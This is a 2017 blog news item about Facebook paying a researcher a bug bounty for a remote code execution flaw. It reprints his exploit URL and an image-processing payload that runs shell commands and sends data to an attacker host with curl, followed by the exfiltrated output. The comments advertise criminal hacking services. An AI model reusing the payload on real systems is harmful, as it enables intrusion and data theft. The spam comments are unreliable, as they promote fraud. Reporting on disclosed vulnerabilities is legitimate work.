Connect with us

Wednesday, 18 January 2017
3 comments

Facebook Awarded $40000 Bug Bounty For Remote Code Execution Vulnerability

Facebook Awarded $40,000 Bug Bounty For Remote Code Execution Vulnerability


Facebook Awarded $40,000 Bug Bounty to Security Researcher For Remote Code Execution Vulnerability.


Yes, you heard right its $40,000 and its higher bug bounty ever from Facebook. Andrey Leonov, a security researcher discovered Remote Execution Vulnerability in Facebook and security reported to the company.

He said in its blog, the vulnerability was accidentally found after being redirected by another to Facebook website.
Once upon a time on Saturday in October i was testing some big service (not Facebook) when some redirect followed me on Facebook. It was a «Share on Facebook» dialog:

Exploit URL:

https://www.facebook.com/dialog/feed?app_id=APP_ID&link=link.example.tld&picture=http%3A%2F%2Fattacker.tld%2Fexploit.png&name=news_name&caption=news_caption&description=news_descriotion&redirect_uri=http%3A%2F%2Fwww.facebook.com&ext=1476569763&hash=Aebid3vZFdh4UF1H

Payload:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context

And result was:

NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A

and so on...

`id` shell command returned:

NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A

For full proof that exploit works he provided to Facebook security team with result of `cat /proc/version` output which is not going to publish in his blog.

The vulnerability was patched by Facebook team and its secure for now.

HOC team is congratulate to Andrey Leonov for bounty award, keep bug hunting as the same in future.

3 comments:

  1. Do you know that your Credit score is the Key to your financial world? Low credit score affect your loans, credit cards, jobs and Insurance. With good Credit report you can have access to more loan choices, easier to get credit cards, pay lower interest rates and pay less for loans and credit cards. I would like to recommend Rajj, a Skilled Ethical Hacker and the best I ever came across. His major is Upgrading Credit Scores on the 3 Credit Bureaus (Equifax, Experian and TransUnion). He's affordable and well skilled like I said earlier. If interested in any other hacking jobs like Phone Hacks, Phone Number Hacks, Chex System Removal, Hacking Tutorials, Email Hacks, Social Media Hacks, Skilled Hacks Into any Financial/Institutional Servers, Firewall Breaches, Change of University Grades, Clear Bad/Criminal Records, Social Media Hacks, e.t.c. If you are going through a hard time, I guess you don't have to look any further again. You should contact him without hesitation via email thishackdisting@gmail.com. He make all communication discreet and a top secret.

    ReplyDelete
  2. This is a great post. I like this topic.This site has lots of advantage.I found many interesting things from this site. It helps me in many ways.Thanks for posting this again.
    buy real active facebook likes

    ReplyDelete

 
Toggle Footer
Top